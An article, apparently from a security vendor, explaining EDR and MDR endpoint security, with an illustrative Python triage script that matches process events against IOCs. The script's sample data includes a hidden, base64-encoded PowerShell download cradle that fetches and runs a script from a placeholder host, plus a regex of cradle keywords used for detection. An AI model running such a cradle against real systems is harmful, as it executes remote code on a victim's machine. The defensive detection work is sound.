This article covers two related topics, both aimed at raising an organization's information security level and reducing data breaches. As cyber attacks have diversified, we observe that many organizations have come under attack and suffered real threats despite running a range of security software. Before going into the details, check whether your organization has the following in place; if it does not, I strongly recommend reading this article carefully.
- Do you have a SOC (Security Operations Center) or a SOME (Siber Olaylara Müdahale Ekibi, the Turkish term for a cyber incident response team)?
- Do you have personnel with expertise in security?
- Has your security software been tested by independent bodies such as NSS Labs and obtained the necessary certifications? Have you reviewed its performance results?
- When a breach or a vulnerability is detected, can you reach its root cause quickly, or does that take you hours or even days?
- Can you examine the endpoint (end user machine) on which the vulnerability or breach occurred while it is isolated from your network?
- Do you have detailed incident investigation records?
The list above can be extended, but to follow the main topic it is worth asking yourself these questions first and thinking through the answers.
**What is EDR (Endpoint Detection and Response)?**
Because attack types keep changing and traditional anti-virus systems are inadequate against them, new attacks continue to affect systems and end users. In particular, the heavy use of PowerShell-based attacks allows many anti-virus products to be bypassed, and similar examples could be multiplied. Before listing what EDR lets us do, it is useful to state the questions this system answers for us:
- What type of attack occurred? (local, remote, malware, ransomware, zero-day)
- What made it possible? (missing updates, incorrect or incomplete configuration, botnet membership, outdated application versions, etc.)
- What was the attack vector? (web-based, e-mail, USB, network-based, etc.)
- When did the attack take place?
- Who or what was affected by the attack?
The advantages of an EDR system can be summarized as follows:
- Detection and analysis of exploit-based attacks,
- Monitoring and recording of every activity on the endpoint,
- Detection of malware that hides itself and periodically attempts lateral movement from the endpoint to exploit other machines on the network,
- Using behavior monitoring and machine learning, it shortens incident detection time and limits the damage the malware does to the host and to the network,
- PowerShell attacks (for example, a file that looks like an Excel document but is actually an executable that launches PowerShell in the background, exposing the user's machine to a backdoor or botnet infection),
- Identifying unknown files or applications, detonating them in a virtual environment (sandbox), and informing the other endpoint products on the network of the verdict,
- Tracking the actions taking place on the endpoints and monitoring their analysis in real time,
- Integration with other product groups (UTM firewall, APT products, etc.) takes your security posture to the next level,
- The endpoint sensor you deploy on the end user's machine lets you see and analyze what happens on that machine: network traffic, processes, SMB and traffic over other protocols,
- It provides valuable evidence during forensic investigations,
- On Windows machines in particular, it tracks registry changes and detects anomalies in the background,
- Processes and services are followed in detail,
- It supports IOCs and YARA rules,
- It lets you search by IP, URL, domain, DNS record, SHA hash, file name and file path,
- Thanks to its easy manageability, it gives you quick access to the time of the event and all of its causes, and while you are taking countermeasures it delivers results to you. It acts as an eye for you on the details you cannot otherwise see.
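As an added illustration of the IOC-search and PowerShell-detection points in the list above, the following Python script runs two checks over a few constructed process-creation events of the kind an EDR sensor records: a lookup of each event's SHA-256, remote IP and contacted domain against a small IOC set, and a behavioral rule that flags an Office application spawning a shell and decodes a PowerShell -EncodedCommand payload to look for a download cradle. This is example code written for this article, not code from any EDR product; the IOC values, host names, paths and events are invented placeholders.

```python
import base64
import ntpath
import re

# Constructed IOC set: placeholder values, not real indicators.
IOCS = {
    "sha256": {"0123456789abcdef" * 4},
    "ip": {"203.0.113.45"},                   # TEST-NET-3 range, documentation use only
    "domain": {"updates.example.invalid"},
}

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Strings typical of a PowerShell download cradle.
CRADLE = re.compile(r"Invoke-Expression|\bIEX\b|DownloadString|Net\.WebClient|FromBase64String", re.I)


def b64_utf16(script):
    """Encode a script the way powershell.exe -EncodedCommand expects (base64 over UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable.
    powershell.exe accepts abbreviated forms of the switch (-e, -ec, -enc, ...)."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        name = tok.lower().lstrip("-/")
        if name and "encodedcommand".startswith(name):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


# Constructed process-creation events, modelled on EDR/Sysmon-style telemetry.
EVENTS = [
    {   # Macro document launches hidden, encoded PowerShell that fetches a script
        "host": "WS01",
        "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -NoP -W Hidden -Enc " + b64_utf16(
            "IEX (New-Object Net.WebClient).DownloadString('http://updates.example.invalid/a.ps1')"),
        "sha256": "b" * 64,
        "remote_ip": "203.0.113.45",
        "domain": "updates.example.invalid",
    },
    {   # Ordinary user activity, should produce no finding
        "host": "WS01",
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\notepad.exe",
        "cmdline": r"notepad.exe C:\Users\ayse\notes.txt",
        "sha256": "c" * 64,
        "remote_ip": None,
        "domain": None,
    },
    {   # Dropped binary whose hash matches the IOC list
        "host": "WS07",
        "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "image": r"C:\Users\ayse\AppData\Local\Temp\update.exe",
        "cmdline": "update.exe /silent",
        "sha256": "0123456789abcdef" * 4,
        "remote_ip": None,
        "domain": None,
    },
]


def triage(events, iocs=IOCS):
    """Return one finding per event that matches an IOC or a behavioral rule."""
    findings = []
    for ev in events:
        hits = []
        if (ev.get("sha256") or "").lower() in iocs["sha256"]:
            hits.append("ioc:sha256")
        if ev.get("remote_ip") in iocs["ip"]:
            hits.append("ioc:ip")
        if (ev.get("domain") or "").lower() in iocs["domain"]:
            hits.append("ioc:domain")
        parent = ntpath.basename(ev["parent"]).lower()
        image = ntpath.basename(ev["image"]).lower()
        if parent in OFFICE_PARENTS and image in SHELLS:
            hits.append("behaviour:office-spawns-shell")
        decoded = decode_encoded_command(ev.get("cmdline", ""))
        if decoded and CRADLE.search(decoded):
            hits.append("behaviour:encoded-download-cradle")
        if hits:
            findings.append({"host": ev["host"], "parent": parent, "image": image,
                             "hits": hits, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f["host"], f["parent"], "->", f["image"], f["hits"])
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

Run stand-alone, the script reports the Excel-to-PowerShell event on WS01 with four hits (IP and domain IOC matches plus both behavioral rules) and the dropped binary on WS07 with a hash match, while the notepad event produces nothing. The point the feature list makes is visible here: the hash lookup alone would have missed the first event, because the PowerShell binary itself is legitimate, and only the parent-child relationship and the decoded command line expose it.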
I have covered what EDR is and how it helps you in general terms. What about the other party, MDR (Managed Detection and Response), and why should it be used?
MDR is a service in which threat detection, response and recovery processes are defined and managed for you. It can be described as a service that aims to ease decision-making and intervention, especially for organizations that have no cyber security experts of their own. It centralizes data protection and response at the endpoints where threats occur, and it is an advanced security service that can be added on top of DLP, SIEM and incident forensics applications. MDR also makes it possible to interpret security incidents and to shape the measures the institution or organization should take. One of the things security experts need most is the ability to define the measures the institution or organization can take against future attacks.
In fact, EDR and MDR are two integrated and closely related security services. According to research, organizations' investment in this area is expected to rise rapidly through 2021. As technology develops day by day, cyber security is taking a structural place within institutions, and the use of EDR and MDR solutions is seen as inevitable. In Turkey, they also support private organizations' KVKK (Personal Data Protection Law) compliance process to a significant degree.
Recently, we observe that industry-leading security vendors such as Trend Micro and Symantec have professionally expanded their service capacity at this point, focusing on EDR and MDR systems for endpoint security. Especially with APT integrations, which we deploy and observe in the field, network activity from Layer 2 to Layer 7 and mail traffic are analyzed in virtual environments (sandboxing technology), and the resulting actions are applied at the endpoints. You can contact us for details.